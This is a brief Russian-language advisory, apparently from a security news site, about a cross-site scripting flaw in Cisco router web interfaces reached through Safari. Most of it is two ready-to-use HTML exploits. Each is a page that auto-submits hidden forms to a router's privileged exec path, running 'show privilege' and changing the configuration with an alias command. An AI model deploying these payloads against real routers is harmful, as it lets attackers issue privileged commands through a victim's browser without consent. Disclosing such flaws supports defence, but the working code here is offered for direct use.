Программа: Cisco Router

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных на маршрутизаторе Cisco при использовании браузера Safari. Атакующий
может выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

Эксплоит:

<html>
<body>

<body onload="asdf.submit();">
<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">
<input type=hidden name=command value="show privilege">
<input type=hidden name=command_url value="/level/15/exec/-">
</body>
</html>

Эксплоит:

<html>
<body>

<body onload="fdsa.submit();">
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
<input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url     value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">
</body>
</html>



Оставить мнение